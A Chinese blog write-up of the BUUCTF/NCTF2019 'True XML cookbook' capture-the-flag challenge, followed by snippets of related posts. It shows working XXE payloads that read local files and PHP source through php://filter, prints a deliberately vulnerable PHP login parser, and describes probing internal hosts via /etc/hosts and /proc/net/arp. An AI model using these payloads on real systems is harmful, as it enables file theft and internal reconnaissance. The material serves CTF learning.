NO.2-32 [NCTF2019]True XML cookbook

最新推荐文章于 2021-10-14 21:33:47 发布
最新推荐文章于 2021-10-14 21:33:47 发布
阅读量250 收藏
点赞数
分类专栏: BUUCTF XXE
原文链接:https://blog.csdn.net/qq_25500649/article/details/117807271
版权
BUUCTF 同时被 2 个专栏收录
60 篇文章 0 订阅
订阅专栏
XXE
2 篇文章 0 订阅
订阅专栏

抓包一看就知道可能是xxe漏洞,拿个exp直接发过去看看效果。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
 <!ENTITY exp SYSTEM "file:///flag">
 ]>
<user><username>&exp;</username><password>aaaa</password></user>

 

不能直接读flag,试一下获取源码。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
 <!ENTITY exp SYSTEM "php://filter/read=convert.base64-encode/resource=doLogin.php">
 ]>
<user><username>&exp;</username><password>aaaa</password></user>

  

<?php
/**
* autor: c0ny1
* date: 2018-2-7
*/
 
$USERNAME = 'admin'; //账号
$PASSWORD = '024b87931a03f738fff6693ce0a78c88'; //密码
$result = null;
 
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
 
try{
        $dom = new DOMDocument();
        $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
        $creds = simplexml_import_dom($dom);
 
        $username = $creds->username;
        $password = $creds->password;
 
        if($username == $USERNAME && $password == $PASSWORD){
                $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
        }else{
                $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
        }
}catch(Exception $e){
        $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}
 
header('Content-Type: text/html; charset=utf-8');
echo $result;
?>%

获取到了源码。没啥用,丝毫没有看到有帮助的信息。

内网探测存活的主机,获取/etc/hosts文件

这里也没有一个可用信息,读取另外一个/proc/net/arp文件

这里就有一个ip了,尝试读取,

有报错,使用intruder扫描c段。

最后获取到flag

 

 

 

nigo134
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[NCTF2019]True XML cookbook
missht0的博客
01-30 404
[NCTF2019]True XML cookbook 抓包,发现存在XXE漏洞 添加外部注入实体 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE hack [ <!ENTITY file SYSTEM "file:///flag"> ]> <user> <username>&admin;</username> <password>password<
[NCTF2019]True XML cookbook 1(XML)
weixin_45577185的博客
10-20 358
总结一下知识点: 抓包,插入恶意XML外部实体 /etc/hosts 储存域名解析的缓存 /etc/passwd 用户密码 /proc/net/arp 每个网络接口的arp表中dev包 直接用下面的代码读取flag会报错 <?xml version="1.0" ?> <!DOCTYPE note [ <!ENTITY M1kael SYSTEM "file:///flag"> ]> <user> <username>&M1kael;&lt
【学习笔记 46】 buu [NCTF2019]Fake XML cookbook
weixin_43553654的博客
08-03 369
0x00 知识点 XXE攻击 0x01 知识点详解 什么是XXE攻击? 答: XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 这里有一篇大佬的博客可以学习学习 0x02 解题思路
buu-[NCTF2019]SQLi
qaq517384的博客
10-14 202
打开界面是一个有sql语句的登录框 老本行robots.txt发现有提示 $black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i"; If $_POST['
BUUCTF [NCTF2019]childRSA(费马小定理)
晓寒的博客
07-12 4021
[NCTF2019]childRSA(费马小定理) 题目 from random import choice from Crypto.Util.number import isPrime, sieve_base as primes from flag import flag def getPrime(bits): while True: n = 2 while n.bit_length() < bits: n *= choice(primes) if isPrime(n + 1): return n
2020/7/07 - [NCTF2019]True XML cookbook - xxe
抒情诗
07-08 695
我准备发两份,一份发到这里,另一份发到CSDN上面,这里的内容浏览器不好搜到,别人看不到,无趣 第二道xxe类型的题了。Content-Type: application/xml;charset=utf-8看看这熟悉的内容,好吧,第一道payload为 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE user [ <!ENTITY xxe SYSTEM "./flag.txt"> ]> <user><
[NCTF2019]True XML cookbook(xxe技巧)
EC_Carrot的博客
12-21 585
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 进到去跟fack那个题目差不多,直接用那里的payload看看 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [ <!ENTITY abc SYSTEM "file:///flag"> ]> <user><username>&am
[NCTF2019]True XML cookbook 1
qq_53460654的博客
05-30 754
之前写了个fake 这次又来个ture 打开环境 明确是xxe 直接抓包 回显位还是1 试试直接读flag <?xml version="1.0" ?> <!DOCTYPE note [ <!ENTITY M1kael SYSTEM "file:///flag"> ]> <user> <username>&M1kael;</username> <password>123456</password> &
[NCTF2019]True XML cookbook 记录
SopRomeo的博客
07-21 1878
提交抓包发现是xxe 先拿XXE漏洞poc读/flag <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE hack [ <!ENTITY file SYSTEM "file:///flag"> ]> <user> <username>&file;</username> <password>hack</password> </user&g.
【xxe漏洞】buu_[NCTF2019]True XML cookbook
serendipity1130的博客
10-09 283
1.打开网页,一个熟悉的界面,抓包发现Content-Type:为application/xml,存在xxe漏洞: 2.读取相关敏感文件proc/net/arp,发现存在一个ip地址: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [ <!ENTITY exp SYSTEM "file:///proc/net/arp"> ]> <user><username>&exp;&
[NCTF2019]SQLi
最新发布
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值